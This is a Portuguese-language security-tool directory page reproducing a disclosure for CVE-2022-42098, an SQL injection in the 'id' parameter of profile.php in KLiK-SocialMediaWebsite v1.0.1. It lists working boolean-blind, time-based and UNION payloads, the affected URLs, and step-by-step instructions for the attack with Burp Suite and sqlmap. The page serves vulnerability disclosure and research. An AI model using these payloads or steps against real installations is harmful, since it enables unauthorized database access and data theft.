Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-42098 — KLiK-SocialMediaWebsite v1.0.1 tem vulnerabilidades de injeção SQL em profile.php | Kitploit
Ferramentas/GitHubGitHub/bypazs/cve-2022-42098
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubbypazs/cve-2022-42098

CVE-2022-42098

KLiK-SocialMediaWebsite v1.0.1 tem vulnerabilidades de injeção SQL em profile.php

Ver Repositório
1há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

KLiK-SocialMediaWebsite versão v1.0.1

Explicação da Vulnerabilidade:

KLiK-SocialMediaWebsite v1.0.1 possui vulnerabilidades de Injeção SQL em profile.php no parâmetro id.

Vetores de Ataque:

KLiK-SocialMediaWebsite v1.0.1 Uma vez que um utilizador tenha sido criado, também é possível encontrar pessoas no KLiK através da página KLiK Users. O parâmetro "id" do profile.php pode ser abusado para injetar consultas SQL arbitrárias.

Afetado:

  • http://ip_address/KLiK/profile.php?id=user_id
  • GET /KLiK/login.php

Payload :

root@kitploit:~
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=27 AND 3227=3227

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=27 AND (SELECT 3046 FROM (SELECT(SLEEP(5)))barN)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: id=-2373 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71787a7171,0x6d67676474624545784f564265735871415865575a4f72697053686d724768624969514c70754459,0x717a707071),NULL,NULL,NULL,NULL,NULL,NULL#

Testado em:

  1. KLiK SocialMediaWebsite versão v1.0.1 (https://github.com/msaad1999/KLiK-SocialMediaWebsite/releases/tag/v1.0.1)

  2. Firefox versão 105

  3. sqlmap versão 1.6.7 estável

Passos para atacar:

  1. Fazer login com nome de utilizador e palavra-passe.
  2. Clicar no ícone que representa uma pessoa no canto superior direito.
  3. Intercetar o pedido utilizando o Burp Suite.
  4. Selecionar um indivíduo da página KLiK Users clicando no seu nome.
  5. Voltando ao Burp Suite, em /profile.php, clicar com o botão direito e selecionar "Copy to file."
  6. Enviar o ficheiro do pedido para o Kali Linux e utilizar o sqlmap com ele.
  7. Vulnerabilidade de Injeção SQL descoberta através do id

Descobridor:

:shipit: Equipa Grim The Ripper pela SOSECURE Tailândia

Medium:

Cronograma de Divulgação:

  • 2022–09–28: Vulnerabilidade descoberta.
  • 2022–09–28: Vulnerabilidade reportada à corporação MITRE.
  • 2022–10–15: CVE foi reservado.
  • 2022–10–31: Divulgação pública da vulnerabilidade.

Referência:

  1. https://github.com/msaad1999/KLiK-SocialMediaWebsite/releases/tag/v1.0.1

  2. https://github.com/msaad1999/KLiK-SocialMediaWebsite

Baixar ferramenta